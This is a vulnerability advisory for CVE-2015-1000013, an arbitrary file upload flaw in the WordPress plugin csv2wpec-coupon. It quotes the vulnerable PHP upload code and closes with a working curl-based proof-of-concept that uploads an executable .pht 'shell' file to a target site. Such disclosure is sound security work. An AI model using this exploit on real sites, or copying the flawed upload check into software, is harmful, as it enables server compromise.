Advisory #: 153
Title: Remote file upload Vulnerability in Wordpress plugin csv2wpec-coupon v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-09-11
[CVE-2015-1000013]
Download Site: https://wordpress.org/plugins/csv2wpec-coupon
Vendor:
Vendor Notified: 2015-09-12
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=153http://www.vapidlabs.com/advisory.php?v=153
Description: Csv2WPeC Coupon provides an easy way to import and export WP e-Commerce Coupon items from and to a CSV file.
Vulnerability:
The code in csv2wpecCoupon_FileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for <?php as <? and a file extension of .pht. This allows a malicious user to upload executable files to a vulnerable wordpress installation. 37 if ( isset( $_FILES[$file_type] ) && !empty( $_FILES[$file_type] ) ) { 38 39 $file = $_FILES[$file_type]; 40 $file_error = $file['error']; 41 42 if ( $file_error === UPLOAD_ERR_OK ) { 43 44 $tmp_name = $file['tmp_name']; 45 46 $file_type = false; 47 if( function_exists( 'finfo_fopen' ) ) { 48 $finfo = finfo_open( FILEINFO_MIME ); 49 $file_type = finfo_file( $finfo, $tmp_name ); 50 finfo_close( $finfo ); 51 } 52 elseif( function_exists( 'mime_content_type' ) ) { 53 $file_type = mime_content_type( $tmp_name ); 54 } 55 elseif ( !is_dir( $tmp_name ) && ( $fn = @fopen( $tmp_name , "rb" ) ) ) { 56 $bin = fread( $fn, $maxlen = 3072 ); 57 fclose( $fn ); 58 if ( strpos( $bin, "<?php" ) !== false ) 59 $file_type = "application/x-httpd-php"; 60 } 61 65 66 if ( empty ( $file_type ) ) 67 $file_type = $file['type']; 68 69 $csv_mimetypes = array( 70 'text/csv', 71 'text/plain', 72 'application/csv', 73 'text/comma-separated-values', 74 'application/excel', 75 'application/vnd.ms-excel', 76 'application/vnd.msexcel', 77 'text/anytext', 78 'application/txt', 79 ); 80 81 if( in_array( $file_type, $csv_mimetypes ) ) { 82 83 if ( isset( $_POST['UPLOAD_DIR'] ) ) { 84 85 $wpsc_upload_dir = $_POST['UPLOAD_DIR']; 86 $dst_name = $file['name']; 87 $dest_file = $wpsc_upload_dir . $dst_name; 88 $dest_file = str_replace( '\\', '/', $dest_file ); // fix path 89 90 if ( move_uploaded_file( $tmp_name, $dest_file ) ) { 91 $_SESSION[$dataKey]['file_uploaded'] = $dest_file; 92 echo "success"; 93 } 94
Export: JSON TEXT XML
Exploit Code:
  1. <?php
  2. echo "Running PoC against target site<br>";
  3. $uploadfile="/var/www/s.pht";
  4. $ch =
  5. curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php");
  6. curl_setopt($ch, CURLOPT_POST, true);
  7. curl_setopt($ch, CURLOPT_POSTFIELDS,
  8. array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht'));
  9. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  10. $postResult = curl_exec($ch);
  11. print "$postResult";
  12. ?>
  13.  
Screen Shots:
Notes: